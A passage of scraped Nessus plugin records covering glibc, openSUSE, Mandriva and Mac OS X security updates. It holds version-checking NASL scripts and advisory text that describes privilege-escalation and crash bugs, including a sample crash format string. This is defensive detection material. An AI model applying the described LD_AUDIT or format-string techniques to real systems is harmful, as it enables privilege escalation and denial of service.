if (rpm_check(release:"SLED11", sp:1, cpu:"i686", reference:"glibc-2.11.1-0.20.1")) flag++;
if (rpm_check(release:"SLED11", sp:1, cpu:"i686", reference:"glibc-devel-2.11.1-0.20.1")) flag++;
if (rpm_check(release:"SLED11", sp:1, cpu:"x86_64", reference:"glibc-2.11.1-0.20.1")) flag++;
if (rpm_check(release:"SLED11", sp:1, cpu:"x86_64", reference:"glibc-32bit-2.11.1-0.20.1")) flag++;
if (rpm_check(release:"SLED11", sp:1, cpu:"x86_64", reference:"glibc-devel-2.11.1-0.20.1")) flag++;
if (rpm_check(release:"SLED11", sp:1, cpu:"x86_64", reference:"glibc-devel-32bit-2.11.1-0.20.1")) flag++;
if (rpm_check(release:"SLED11", sp:1, cpu:"x86_64", reference:"glibc-i18ndata-2.11.1-0.20.1")) flag++;
if (rpm_check(release:"SLED11", sp:1, cpu:"x86_64", reference:"glibc-locale-2.11.1-0.20.1")) flag++;
if (rpm_check(release:"SLED11", sp:1, cpu:"x86_64", reference:"glibc-locale-32bit-2.11.1-0.20.1")) flag++;
if (rpm_check(release:"SLED11", sp:1, cpu:"x86_64", reference:"nscd-2.11.1-0.20.1")) flag++;
if (rpm_check(release:"SLES11", sp:0, reference:"glibc-2.9-13.11.1")) flag++;
if (rpm_check(release:"SLES11", sp:0, reference:"glibc-devel-2.9-13.11.1")) flag++;
if (rpm_check(release:"SLES11", sp:0, reference:"glibc-html-2.9-13.11.1")) flag++;
if (rpm_check(release:"SLES11", sp:0, reference:"glibc-i18ndata-2.9-13.11.1")) flag++;
if (rpm_check(release:"SLES11", sp:0, reference:"glibc-info-2.9-13.11.1")) flag++;
if (rpm_check(release:"SLES11", sp:0, reference:"glibc-locale-2.9-13.11.1")) flag++;
if (rpm_check(release:"SLES11", sp:0, reference:"glibc-profile-2.9-13.11.1")) flag++;
if (rpm_check(release:"SLES11", sp:0, reference:"nscd-2.9-13.11.1")) flag++;
if (rpm_check(release:"SLES11", sp:0, cpu:"s390x", reference:"glibc-32bit-2.9-13.11.1")) flag++;
if (rpm_check(release:"SLES11", sp:0, cpu:"s390x", reference:"glibc-devel-32bit-2.9-13.11.1")) flag++;
if (rpm_check(release:"SLES11", sp:0, cpu:"s390x", reference:"glibc-locale-32bit-2.9-13.11.1")) flag++;
if (rpm_check(release:"SLES11", sp:0, cpu:"s390x", reference:"glibc-profile-32bit-2.9-13.11.1")) flag++;
if (rpm_check(release:"SLES11", sp:0, cpu:"x86_64", reference:"glibc-32bit-2.9-13.11.1")) flag++;
if (rpm_check(release:"SLES11", sp:0, cpu:"x86_64", reference:"glibc-devel-32bit-2.9-13.11.1")) flag++;
if (rpm_check(release:"SLES11", sp:0, cpu:"x86_64", reference:"glibc-locale-32bit-2.9-13.11.1")) flag++;
if (rpm_check(release:"SLES11", sp:0, cpu:"x86_64", reference:"glibc-profile-32bit-2.9-13.11.1")) flag++;
if (rpm_check(release:"SLES11", sp:1, reference:"glibc-2.11.1-0.20.1")) flag++;
if (rpm_check(release:"SLES11", sp:1, reference:"glibc-devel-2.11.1-0.20.1")) flag++;
if (rpm_check(release:"SLES11", sp:1, reference:"glibc-html-2.11.1-0.20.1")) flag++;
if (rpm_check(release:"SLES11", sp:1, reference:"glibc-i18ndata-2.11.1-0.20.1")) flag++;
if (rpm_check(release:"SLES11", sp:1, reference:"glibc-info-2.11.1-0.20.1")) flag++;
if (rpm_check(release:"SLES11", sp:1, reference:"glibc-locale-2.11.1-0.20.1")) flag++;
if (rpm_check(release:"SLES11", sp:1, reference:"glibc-profile-2.11.1-0.20.1")) flag++;
if (rpm_check(release:"SLES11", sp:1, reference:"nscd-2.11.1-0.20.1")) flag++;
if (rpm_check(release:"SLES11", sp:1, cpu:"s390x", reference:"glibc-32bit-2.11.1-0.20.1")) flag++;
if (rpm_check(release:"SLES11", sp:1, cpu:"s390x", reference:"glibc-devel-32bit-2.11.1-0.20.1")) flag++;
if (rpm_check(release:"SLES11", sp:1, cpu:"s390x", reference:"glibc-locale-32bit-2.11.1-0.20.1")) flag++;
if (rpm_check(release:"SLES11", sp:1, cpu:"s390x", reference:"glibc-profile-32bit-2.11.1-0.20.1")) flag++;
if (rpm_check(release:"SLES11", sp:1, cpu:"x86_64", reference:"glibc-32bit-2.11.1-0.20.1")) flag++;
if (rpm_check(release:"SLES11", sp:1, cpu:"x86_64", reference:"glibc-devel-32bit-2.11.1-0.20.1")) flag++;
if (rpm_check(release:"SLES11", sp:1, cpu:"x86_64", reference:"glibc-locale-32bit-2.11.1-0.20.1")) flag++;
if (rpm_check(release:"SLES11", sp:1, cpu:"x86_64", reference:"glibc-profile-32bit-2.11.1-0.20.1")) flag++;

if (flag)
{
  if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());
  else security_hole(0);
  exit(0);
}
else audit(AUDIT_HOST_NOT, "affected");
```
NASL family | Mandriva Local Security Checks |
NASL id | MANDRIVA_MDVSA-2010-111.NASL |
description | Multiple vulnerabilities were discovered and fixed in glibc : Multiple integer overflows in the strfmon implementation in the GNU C Library (aka glibc or libc6) 2.10.1 and earlier allow context-dependent attackers to cause a denial of service (memory consumption or application crash) via a crafted format string, as demonstrated by a crafted first argument to the money_format function in PHP, a related issue to CVE-2008-1391 (CVE-2009-4880). Integer overflow in the __vstrfmon_l function in stdlib/strfmon_l.c in the strfmon implementation in the GNU C Library (aka glibc or libc6) before 2.10.1 allows context-dependent attackers to cause a denial of service (application crash) via a crafted format string, as demonstrated by the %99999999999999999999n string, a related issue to CVE-2008-1391 (CVE-2009-4881). nis/nss_nis/nis-pwd.c in the GNU C Library (aka glibc or libc6) 2.7 and Embedded GLIBC (EGLIBC) 2.10.2 adds information from the passwd.adjunct.byname map to entries in the passwd map, which allows remote attackers to obtain the encrypted passwords of NIS accounts by calling the getpwnam function (CVE-2010-0015). The encode_name macro in misc/mntent_r.c in the GNU C Library (aka glibc or libc6) 2.11.1 and earlier, as used by ncpmount and mount.cifs, does not properly handle newline characters in mountpoint names, which allows local users to cause a denial of service (mtab corruption), or possibly modify mount options and gain privileges, via a crafted mount request (CVE-2010-0296). Integer signedness error in the elf_get_dynamic_info function in elf/dynamic-link.h in ld.so in the GNU C Library (aka glibc or libc6) 2.0.1 through 2.11.1, when the --verify option is used, allows user-assisted remote attackers to execute arbitrary code via a crafted ELF program with a negative value for a certain d_tag structure member in the ELF header (CVE-2010-0830). Packages for 2008.0 and 2009.0 are provided as of the Extended Maintenance Program. Please visit this link to learn more: http://store.mandriva.com/product_info.php?cPath=149&products_id=490 The updated packages have been patched to correct these issues. |
last seen | 2020-06-01 |
modified | 2020-06-02 |
plugin id | 46849 |
published | 2010-06-09 |
reporter | This script is Copyright (C) 2010-2019 Tenable Network Security, Inc. |
source | https://www.tenable.com/plugins/nessus/46849 |
title | Mandriva Linux Security Advisory : glibc (MDVSA-2010:111) |
code |
#%NASL_MIN_LEVEL 80502
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were
# extracted from Mandriva Linux Security Advisory MDVSA-2010:111.
# The text itself is copyright (C) Mandriva S.A.
#

include("compat.inc");

if (description)
{
  script_id(46849);
  script_version("1.12");
  script_cvs_date("Date: 2019/08/02 13:32:53");

  script_cve_id("CVE-2009-4880", "CVE-2009-4881", "CVE-2010-0015", "CVE-2010-0296", "CVE-2010-0830");
  script_bugtraq_id(36443, 37885, 40063);
  script_xref(name:"MDVSA", value:"2010:111");

  script_name(english:"Mandriva Linux Security Advisory : glibc (MDVSA-2010:111)");
  script_summary(english:"Checks rpm output for the updated packages");

  script_set_attribute(
    attribute:"synopsis",
    value:
    "The remote Mandriva Linux host is missing one or more security updates."
  );
  script_set_attribute(
    attribute:"description",
    value:
    "Multiple vulnerabilities was discovered and fixed in glibc :

Multiple integer overflows in the strfmon implementation in the GNU C
Library (aka glibc or libc6) 2.10.1 and earlier allow
context-dependent attackers to cause a denial of service (memory
consumption or application crash) via a crafted format string, as
demonstrated by a crafted first argument to the money_format function
in PHP, a related issue to CVE-2008-1391 (CVE-2009-4880).

Integer overflow in the __vstrfmon_l function in stdlib/strfmon_l.c in
the strfmon implementation in the GNU C Library (aka glibc or libc6)
before 2.10.1 allows context-dependent attackers to cause a denial of
service (application crash) via a crafted format string, as
demonstrated by the %99999999999999999999n string, a related issue to
CVE-2008-1391 (CVE-2009-4881).

nis/nss_nis/nis-pwd.c in the GNU C Library (aka glibc or libc6) 2.7
and Embedded GLIBC (EGLIBC) 2.10.2 adds information from the
passwd.adjunct.byname map to entries in the passwd map, which allows
remote attackers to obtain the encrypted passwords of NIS accounts by
calling the getpwnam function (CVE-2010-0015).

The encode_name macro in misc/mntent_r.c in the GNU C Library (aka
glibc or libc6) 2.11.1 and earlier, as used by ncpmount and
mount.cifs, does not properly handle newline characters in mountpoint
names, which allows local users to cause a denial of service (mtab
corruption), or possibly modify mount options and gain privileges, via
a crafted mount request (CVE-2010-0296).

Integer signedness error in the elf_get_dynamic_info function in
elf/dynamic-link.h in ld.so in the GNU C Library (aka glibc or libc6)
2.0.1 through 2.11.1, when the --verify option is used, allows
user-assisted remote attackers to execute arbitrary code via a crafted
ELF program with a negative value for a certain d_tag structure member
in the ELF header (CVE-2010-0830).

Packages for 2008.0 and 2009.0 are provided as of the Extended
Maintenance Program. Please visit this link to learn more:
http://store.mandriva.com/product_info.php?cPath=149&products_id=4
90

The updated packages have been patched to correct these issues."
  );
  script_set_attribute(attribute:"solution", value:"Update the affected packages.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_cwe_id(255);

  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:mandriva:linux:glibc");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:mandriva:linux:glibc-devel");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:mandriva:linux:glibc-doc");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:mandriva:linux:glibc-doc-pdf");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:mandriva:linux:glibc-i18ndata");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:mandriva:linux:glibc-profile");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:mandriva:linux:glibc-static-devel");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:mandriva:linux:glibc-utils");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:mandriva:linux:nscd");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:mandriva:linux:2008.0");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:mandriva:linux:2009.0");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:mandriva:linux:2009.1");
  script_set_attribute(attribute:"patch_publication_date", value:"2010/06/08");
  script_set_attribute(attribute:"plugin_publication_date", value:"2010/06/09");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_copyright(english:"This script is Copyright (C) 2010-2019 Tenable Network Security, Inc.");
  script_family(english:"Mandriva Local Security Checks");

  script_dependencies("ssh_get_info.nasl");
  script_require_keys("Host/local_checks_enabled", "Host/cpu", "Host/Mandrake/release", "Host/Mandrake/rpm-list");

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("rpm.inc");

if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
if (!get_kb_item("Host/Mandrake/release")) audit(AUDIT_OS_NOT, "Mandriva / Mandake Linux");
if (!get_kb_item("Host/Mandrake/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING);

cpu = get_kb_item("Host/cpu");
if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);
if (cpu !~ "^(amd64|i[3-6]86|x86_64)$") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Mandriva / Mandrake Linux", cpu);

flag = 0;
if (rpm_check(release:"MDK2008.0", reference:"glibc-2.6.1-4.4mdv2008.0", yank:"mdv")) flag++;
if (rpm_check(release:"MDK2008.0", reference:"glibc-devel-2.6.1-4.4mdv2008.0", yank:"mdv")) flag++;
if (rpm_check(release:"MDK2008.0", reference:"glibc-doc-2.6.1-4.4mdv2008.0", yank:"mdv")) flag++;
if (rpm_check(release:"MDK2008.0", reference:"glibc-doc-pdf-2.6.1-4.4mdv2008.0", yank:"mdv")) flag++;
if (rpm_check(release:"MDK2008.0", reference:"glibc-i18ndata-2.6.1-4.4mdv2008.0", yank:"mdv")) flag++;
if (rpm_check(release:"MDK2008.0", reference:"glibc-profile-2.6.1-4.4mdv2008.0", yank:"mdv")) flag++;
if (rpm_check(release:"MDK2008.0", reference:"glibc-static-devel-2.6.1-4.4mdv2008.0", yank:"mdv")) flag++;
if (rpm_check(release:"MDK2008.0", reference:"glibc-utils-2.6.1-4.4mdv2008.0", yank:"mdv")) flag++;
if (rpm_check(release:"MDK2008.0", reference:"nscd-2.6.1-4.4mdv2008.0", yank:"mdv")) flag++;
if (rpm_check(release:"MDK2009.0", reference:"glibc-2.8-1.20080520.5.5mnb2")) flag++;
if (rpm_check(release:"MDK2009.0", reference:"glibc-devel-2.8-1.20080520.5.5mnb2")) flag++;
if (rpm_check(release:"MDK2009.0", reference:"glibc-doc-2.8-1.20080520.5.5mnb2")) flag++;
if (rpm_check(release:"MDK2009.0", reference:"glibc-doc-pdf-2.8-1.20080520.5.5mnb2")) flag++;
if (rpm_check(release:"MDK2009.0", reference:"glibc-i18ndata-2.8-1.20080520.5.5mnb2")) flag++;
if (rpm_check(release:"MDK2009.0", reference:"glibc-profile-2.8-1.20080520.5.5mnb2")) flag++;
if (rpm_check(release:"MDK2009.0", reference:"glibc-static-devel-2.8-1.20080520.5.5mnb2")) flag++;
if (rpm_check(release:"MDK2009.0", reference:"glibc-utils-2.8-1.20080520.5.5mnb2")) flag++;
if (rpm_check(release:"MDK2009.0", reference:"nscd-2.8-1.20080520.5.5mnb2")) flag++;
if (rpm_check(release:"MDK2009.1", reference:"glibc-2.9-0.20081113.5.1mnb2")) flag++;
if (rpm_check(release:"MDK2009.1", reference:"glibc-devel-2.9-0.20081113.5.1mnb2")) flag++;
if (rpm_check(release:"MDK2009.1", reference:"glibc-doc-2.9-0.20081113.5.1mnb2")) flag++;
if (rpm_check(release:"MDK2009.1", reference:"glibc-doc-pdf-2.9-0.20081113.5.1mnb2")) flag++;
if (rpm_check(release:"MDK2009.1", reference:"glibc-i18ndata-2.9-0.20081113.5.1mnb2")) flag++;
if (rpm_check(release:"MDK2009.1", reference:"glibc-profile-2.9-0.20081113.5.1mnb2")) flag++;
if (rpm_check(release:"MDK2009.1", reference:"glibc-static-devel-2.9-0.20081113.5.1mnb2")) flag++;
if (rpm_check(release:"MDK2009.1", reference:"glibc-utils-2.9-0.20081113.5.1mnb2")) flag++;
if (rpm_check(release:"MDK2009.1", reference:"nscd-2.9-0.20081113.5.1mnb2")) flag++;

if (flag)
{
  if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());
  else security_hole(0);
  exit(0);
}
else audit(AUDIT_HOST_NOT, "affected");
NASL family | SuSE Local Security Checks |
NASL id | SUSE_11_2_GLIBC-101027.NASL |
description | This update of glibc fixes various bugs and security issues : CVE-2010-3847: Decoding of the $ORIGIN special value in various LD_ environment variables allowed local attackers to execute code in context of e.g. setuid root programs, elevating privileges. This issue does not affect SUSE as an assertion triggers before the respective code is executed. The bug was fixed nevertheless. CVE-2010-3856: The LD_AUDIT environment was not pruned during setuid root execution and could load shared libraries from standard system library paths. This could be used by local attackers to inject code into setuid root programs and so elevated privileges. CVE-2010-0830: Integer overflow causing arbitrary code execution in ld.so --verify mode could be induced by a specially crafted binary. CVE-2010-0296: The addmntent() function would not escape the newline character properly, allowing the user to insert arbitrary newlines to the /etc/mtab; if the addmntent() is run by a setuid mount binary that does not do extra input checking, this would allow custom entries to be inserted in /etc/mtab. CVE-2008-1391: The strfmon() function contains an integer overflow vulnerability in width specifiers handling that could be triggered by an attacker that can control the format string passed to strfmon(). |
last seen | 2020-06-01 |
modified | 2020-06-02 |
plugin id | 50373 |
published | 2010-10-28 |
reporter | This script is Copyright (C) 2010-2019 and is owned by Tenable, Inc. or an Affiliate thereof. |
source | https://www.tenable.com/plugins/nessus/50373 |
title | openSUSE Security Update : glibc (openSUSE-SU-2010:0913-1) |
code |
#%NASL_MIN_LEVEL 80502
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were
# extracted from openSUSE Security Update glibc-3400.
#
# The text description of this plugin is (C) SUSE LLC.
#

include("compat.inc");

if (description)
{
  script_id(50373);
  script_version("1.11");
  script_cvs_date("Date: 2019/10/25 13:36:38");

  script_cve_id("CVE-2008-1391", "CVE-2010-0296", "CVE-2010-0830", "CVE-2010-3847", "CVE-2010-3856");

  script_name(english:"openSUSE Security Update : glibc (openSUSE-SU-2010:0913-1)");
  script_summary(english:"Check for the glibc-3400 patch");

  script_set_attribute(
    attribute:"synopsis",
    value:"The remote openSUSE host is missing a security update."
  );
  script_set_attribute(
    attribute:"description",
    value:
    "This update of glibc fixes various bugs and security issues :

CVE-2010-3847: Decoding of the $ORIGIN special value in various LD_
environment variables allowed local attackers to execute code in
context of e.g. setuid root programs, elevating privileges. This issue
does not affect SUSE as an assertion triggers before the respective
code is executed. The bug was fixed nevertheless.

CVE-2010-3856: The LD_AUDIT environment was not pruned during setuid
root execution and could load shared libraries from standard system
library paths. This could be used by local attackers to inject code
into setuid root programs and so elevated privileges.

CVE-2010-0830: Integer overflow causing arbitrary code execution in
ld.so --verify mode could be induced by a specially crafted binary.

CVE-2010-0296: The addmntent() function would not escape the newline
character properly, allowing the user to insert arbitrary newlines to
the /etc/mtab; if the addmntent() is run by a setuid mount binary that
does not do extra input checking, this would allow custom entries to
be inserted in /etc/mtab.

CVE-2008-1391: The strfmon() function contains an integer overflow
vulnerability in width specifiers handling that could be triggered by
an attacker that can control the format string passed to strfmon()."
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://bugzilla.novell.com/show_bug.cgi?id=375315"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://bugzilla.novell.com/show_bug.cgi?id=572188"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://bugzilla.novell.com/show_bug.cgi?id=592941"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://bugzilla.novell.com/show_bug.cgi?id=594263"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://bugzilla.novell.com/show_bug.cgi?id=646960"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://lists.opensuse.org/opensuse-updates/2010-10/msg00040.html"
  );
  script_set_attribute(
    attribute:"solution",
    value:"Update the affected glibc packages."
  );
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"exploit_framework_core", value:"true");
  script_set_attribute(attribute:"metasploit_name", value:'glibc LD_AUDIT Arbitrary DSO Load Privilege Escalation');
  script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
  script_set_attribute(attribute:"exploit_framework_canvas", value:"true");
  script_set_attribute(attribute:"canvas_package", value:'CANVAS');
  script_cwe_id(189);

  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:glibc");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:glibc-32bit");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:glibc-devel");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:glibc-devel-32bit");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:glibc-html");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:glibc-i18ndata");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:glibc-info");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:glibc-locale");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:glibc-locale-32bit");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:glibc-obsolete");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:glibc-profile");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:glibc-profile-32bit");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:nscd");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:novell:opensuse:11.2");
  script_set_attribute(attribute:"patch_publication_date", value:"2010/10/27");
  script_set_attribute(attribute:"plugin_publication_date", value:"2010/10/28");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_copyright(english:"This script is Copyright (C) 2010-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
  script_family(english:"SuSE Local Security Checks");

  script_dependencies("ssh_get_info.nasl");
  script_require_keys("Host/local_checks_enabled", "Host/SuSE/release", "Host/SuSE/rpm-list", "Host/cpu");

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("rpm.inc");

if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
release = get_kb_item("Host/SuSE/release");
if (isnull(release) || release =~ "^(SLED|SLES)") audit(AUDIT_OS_NOT, "openSUSE");
if (release !~ "^(SUSE11\.2)$") audit(AUDIT_OS_RELEASE_NOT, "openSUSE", "11.2", release);
if (!get_kb_item("Host/SuSE/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING);

ourarch = get_kb_item("Host/cpu");
if (!ourarch) audit(AUDIT_UNKNOWN_ARCH);
if (ourarch !~ "^(i586|i686|x86_64)$") audit(AUDIT_ARCH_NOT, "i586 / i686 / x86_64", ourarch);

flag = 0;
if ( rpm_check(release:"SUSE11.2", reference:"glibc-2.10.1-10.9.1") ) flag++;
if ( rpm_check(release:"SUSE11.2", reference:"glibc-devel-2.10.1-10.9.1") ) flag++;
if ( rpm_check(release:"SUSE11.2", reference:"glibc-html-2.10.1-10.9.1") ) flag++;
if ( rpm_check(release:"SUSE11.2", reference:"glibc-i18ndata-2.10.1-10.9.1") ) flag++;
if ( rpm_check(release:"SUSE11.2", reference:"glibc-info-2.10.1-10.9.1") ) flag++;
if ( rpm_check(release:"SUSE11.2", reference:"glibc-locale-2.10.1-10.9.1") ) flag++;
if ( rpm_check(release:"SUSE11.2", reference:"glibc-obsolete-2.10.1-10.9.1") ) flag++;
if ( rpm_check(release:"SUSE11.2", reference:"glibc-profile-2.10.1-10.9.1") ) flag++;
if ( rpm_check(release:"SUSE11.2", reference:"nscd-2.10.1-10.9.1") ) flag++;
if ( rpm_check(release:"SUSE11.2", cpu:"x86_64", reference:"glibc-32bit-2.10.1-10.9.1") ) flag++;
if ( rpm_check(release:"SUSE11.2", cpu:"x86_64", reference:"glibc-devel-32bit-2.10.1-10.9.1") ) flag++;
if ( rpm_check(release:"SUSE11.2", cpu:"x86_64", reference:"glibc-locale-32bit-2.10.1-10.9.1") ) flag++;
if ( rpm_check(release:"SUSE11.2", cpu:"x86_64", reference:"glibc-profile-32bit-2.10.1-10.9.1") ) flag++;

if (flag)
{
  if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());
  else security_hole(0);
  exit(0);
}
else
{
  tested = pkg_tests_get();
  if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
  else audit(AUDIT_PACKAGE_NOT_INSTALLED, "glibc");
}
NASL family | MacOS X Local Security Checks |
NASL id | MACOSX_10_5_6.NASL |
description | The remote host is running a version of Mac OS X 10.5.x that is prior to 10.5.6. Mac OS X 10.5.6 contains security fixes for the following products : ATS, BOM, CoreGraphics, CoreServices, CoreTypes, Flash Player Plug-in, Kernel, Libsystem, Managed Client, network_cmds, Podcast Producer, UDF |
last seen | 2020-06-01 |
modified | 2020-06-02 |
plugin id | 35111 |
published | 2008-12-16 |
reporter | This script is Copyright (C) 2008-2018 Tenable Network Security, Inc. |
source | https://www.tenable.com/plugins/nessus/35111 |
title | Mac OS X 10.5.x < 10.5.6 Multiple Vulnerabilities |
code |
#
# (C) Tenable Network Security, Inc.
#

if (!defined_func("bn_random")) exit(0);
if (NASL_LEVEL < 3004) exit(0);

include("compat.inc");

if (description)
{
  script_id(35111);
  script_version("1.21");
  script_cvs_date("Date: 2018/07/14 1:59:35");

  script_cve_id(
    "CVE-2008-1391", "CVE-2008-3170", "CVE-2008-3623", "CVE-2008-4217",
    "CVE-2008-4218", "CVE-2008-4219", "CVE-2008-4220", "CVE-2008-4221",
    "CVE-2008-4222", "CVE-2008-4223", "CVE-2008-4224", "CVE-2008-4234",
    "CVE-2008-4236", "CVE-2008-4237", "CVE-2008-4818", "CVE-2008-4819",
    "CVE-2008-4820", "CVE-2008-4821", "CVE-2008-4822", "CVE-2008-4823",
    "CVE-2008-4824"
  );
  script_bugtraq_id(
    28479, 30192, 32129, 32291, 32870, 32872, 32873, 32874, 32875, 32876,
    32877, 32879, 32880, 32881
  );

  script_name(english:"Mac OS X 10.5.x < 10.5.6 Multiple Vulnerabilities");
  script_summary(english:"Check the version of Mac OS X");

  script_set_attribute(attribute:"synopsis", value:
"The remote host is missing a Mac OS X update that fixes various
security issues." );
  script_set_attribute(attribute:"description", value:
"The remote host is running a version of Mac OS X 10.5.x that is prior
to 10.5.6.

Mac OS X 10.5.6 contains security fixes for the following products :

  - ATS
  - BOM
  - CoreGraphics
  - CoreServices
  - CoreTypes
  - Flash Player Plug-in
  - Kernel
  - Libsystem
  - Managed Client
  - network_cmds
  - Podcast Producer
  - UDF" );
  script_set_attribute(attribute:"see_also", value:"http://support.apple.com/kb/HT3338" );
  script_set_attribute(attribute:"see_also", value:"http://lists.apple.com/archives/security-announce/2008/Dec/msg00000.html" );
  script_set_attribute(attribute:"solution", value:
"Upgrade to Mac OS X 10.5.6 or later." );
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_cwe_id(20, 79, 119, 189, 200, 264, 287, 399);

  script_set_attribute(attribute:"plugin_publication_date", value: "2008/12/16");
  script_set_attribute(attribute:"patch_publication_date", value: "2008/12/15");
  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:apple:mac_os_x");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_family(english:"MacOS X Local Security Checks");
  script_copyright(english:"This script is Copyright (C) 2008-2018 Tenable Network Security, Inc.");

  script_dependencies("ssh_get_info.nasl", "os_fingerprint.nasl");
  exit(0);
}

os = get_kb_item("Host/MacOSX/Version");
if (!os) os = get_kb_item("Host/OS");
if (!os) exit(0);

# Flag any 10.5.0 through 10.5.5 release; 10.5.6 and later are patched.
if (ereg(pattern:"Mac OS X 10\.5\.[0-5]([^0-9]|$)", string:os))
  security_hole(0);
NASL family | SuSE Local Security Checks |
NASL id | SUSE9_12641.NASL |
description | Several security issues were fixed : - Integer overflow causing arbitrary code execution in ld.so --verify mode could be induced by a specially crafted binary. (CVE-2010-0830) - The addmntent() function would not escape the newline character properly, allowing the user to insert arbitrary newlines to the /etc/mtab; if the addmntent() is run by a setuid mount binary that does not do extra input checking, this would allow custom entries to be inserted in /etc/mtab. (CVE-2010-0296) - The strfmon() function contains an integer overflow vulnerability in width specifiers handling that could be triggered by an attacker that can control the format string passed to strfmon(). (CVE-2008-1391) Also one non-security issue was fixed: - nscd in the paranoia mode would crash on the periodic restart in case one of the databases was disabled in the nscd configuration. In addition, the timezone information was updated to the level of 2010l, including the following changes : - Africa/Cairo (Egypt) and Asia/Gaza (Palestine) do not use daylight saving during the month of Ramadan in order to prevent Muslims from fasting one hour longer. http://www.timeanddate.com/news/time/egypt-ends-dst-2010.html http://www.timeanddate.com/news/time/westbank-gaza-end-dst-2010.html - Africa/Casablanca (Morocco) has spent the period from May 2 to Aug 8 using daylight saving. Morocco adopted regular daylight saving, but the start and end dates vary every year. http://www.timeanddate.com/news/time/morocco-starts-dst-2010.html - America/Argentina/San_Luis (Argentina region) local government did not terminate its DST period as planned and instead decided to extend its use of the UTC-3 time indefinitely. http://www.worldtimezone.com/dst_news/dst_news_argentina08.html New zones : - America/Bahia_Banderas (Mexican state of Nayarit) has declared that it is to follow the UTC-6 time instead of UTC-7, with the aim to have the same time as the nearby city of Puerto Vallarta. http://www.worldtimezone.com/dst_news/dst_news_mexico08.html Historical changes : - Asia/Taipei information on DST usage listed 1980 as one year using DST, which should read 1979 instead according to government resources. - Europe/Helsinki, before switching to Central European standard DST in 1983, trialled DST for two years. However, the database omitted to specify that in these trials of 1981 and 1982, switches have been made one hour earlier than in 1983. Spelling changes in Micronesia: - Pacific/Truk has been renamed to Pacific/Chuuk in 1989. - Pacific/Ponape has been renamed to Pacific/Pohnpei in 1984. |
last seen | 2020-06-01 |
modified | 2020-06-02 |
plugin id | 49758 |
published | 2010-10-06 |
reporter | This script is Copyright (C) 2010-2019 Tenable Network Security, Inc. |
source | https://www.tenable.com/plugins/nessus/49758 |
title | SuSE9 Security Update : glibc (YOU Patch Number 12641) |
code |
#%NASL_MIN_LEVEL 80502
#
# (C) Tenable Network Security, Inc.
#
# The text description of this plugin is (C) Novell, Inc.
#

